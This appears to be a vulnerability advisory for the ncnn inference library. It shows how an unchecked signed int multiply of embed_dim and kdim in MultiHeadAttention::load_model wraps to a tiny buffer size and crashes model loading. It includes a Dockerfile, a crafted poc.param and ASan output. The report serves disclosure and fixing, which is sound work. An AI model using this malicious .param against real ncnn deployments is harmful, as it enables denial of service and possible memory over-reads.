MultiHeadAttention Dimension Overflow Causes Conversion Crash
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/multiheadattention.cpp:190 in MultiHeadAttention::load_model
Sanitizer verdict: out of memory: allocator is trying to allocate 0x1555555844 bytes
The observed crash lands in src/allocator.h:62, which is the ISA-specialised copy of the reported code path.
Summary
MultiHeadAttention::load_model multiplies two attacker-controlled dimensions in signed int to size each projection weight buffer. With embed_dim = 3 and kdim = vdim = 1431655766 the product overflows and wraps to 2, so the loader allocates and accepts two-element weight buffers for tensors the rest of the pipeline believes are billions of elements long. The x86 MultiHeadAttention/Gemm pipeline then sizes its repacking buffer from the unwrapped kdim, and the process dies during model loading. The PoC drives ncnnllm2int, which calls Net::load_model on an attacker-supplied .param with null as the weight file.
Detail
The untrusted fields are the MultiHeadAttention parameters 0 (embed_dim), 3 (kdim) and 4 (vdim). load_param stores each with pd.get and no bound: embed_dim = pd.get(0, 0), kdim = pd.get(3, embed_dim), vdim = pd.get(4, embed_dim). Only quantize_term is validated.
load_model forms each weight extent as a product of two of those ints and passes it directly to mb.load. Signed overflow is undefined behaviour and in practice wraps modulo 2^32, so a huge kdim can be turned into a tiny, positive request. The .empty() guard that follows only confirms the buffer was allocated — it cannot detect that the requested extent is not the extent the pipeline will later assume, because the pipeline re-derives its own sizes from the raw, unwrapped kdim/vdim.
// src/layer/multiheadattention.cpp:53
embed_dim = pd.get(0, 0);
num_heads = pd.get(1, 1);
weight_data_size = pd.get(2, 0);
kdim = pd.get(3, embed_dim);
vdim = pd.get(4, embed_dim);
// src/layer/multiheadattention.cpp:190
k_weight_data = mb.load(embed_dim * kdim, 0);
if (k_weight_data.empty())
return -100;
// src/layer/x86/multiheadattention_x86.cpp:494
pd.set(7, embed_dim); // M
pd.set(8, 0); // N
pd.set(9, kdim); // K
// src/layer/x86/gemm_x86.cpp:7473
AT_data.create(TILE_K * TILE_M, nn_K, nn_M, 4u, (Allocator*)0);
With the PoC's 0=3 3=1431655766, embed_dim * kdim is 4294967298, which wraps to 2; mb.load(2, 0) succeeds against the empty data reader and the .empty() check passes. MultiHeadAttention_x86::create_pipeline then configures the K-projection Gemm with M = embed_dim = 3 and K = kdim = 1431655766 — the unwrapped value — and hands it the two-element k_weight_data as its constant A operand. Gemm_x86::create_pipeline sizes the repacked-A buffer from M and K, so AT_data.create requests roughly K * M * 4 bytes, the 0x1555555844 figure in the sanitizer output, and fastMalloc aborts the conversion process. Where the allocation succeeds instead, the packing loop that follows copies M * K floats out of a two-element source buffer.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-multiheadattention-dimension-overflow-causes-conversion-crash && cd ncnn-poc-multiheadattention-dimension-overflow-causes-conversion-crash
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_EOF'
7767517
1 1
MultiHeadAttention mha 0 0 0=3 2=3 3=1431655766
POC_EOF
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/quantize/ncnnllm2int poc.param null out.param out.bin
AddressSanitizer output:
=================================================================
==1==ERROR: AddressSanitizer: out of memory: allocator is trying to allocate 0x1555555844 bytes
#0 0x7f41cc41af1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x585f468261e7 in fastMalloc /ncnn/src/allocator.h:62
#2 0x585f468261e7 in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x585f4cf61bc1 in ncnn::Gemm_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7473
#4 0x585f4ee0b9e6 in ncnn::MultiHeadAttention_x86_avx512::create_pipeline(ncnn::Option const&) /ncnn/build/src/layer/x86/multiheadattention_x86_avx512.cpp:522
#5 0x585f468c1562 in ncnn::Net::load_model(ncnn::DataReader const&) /ncnn/src/net.cpp:2094
#6 0x585f467ca9d4 in main /ncnn/tools/quantize/ncnnllm2int.cpp:969
#7 0x7f41cbda11c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#8 0x7f41cbda128a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#9 0x585f4675f6e4 in _start (/ncnn/build/tools/quantize/ncnnllm2int+0x2a26e4) (BuildId: 425782183b6701315c7daa0360541799400e7e53)
==1==HINT: if you don't care about these errors you may set allocator_may_return_null=1
SUMMARY: AddressSanitizer: out-of-memory ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145 in posix_memalign
==1==ABORTING
Credit
Zheng Yu @ DepthFirst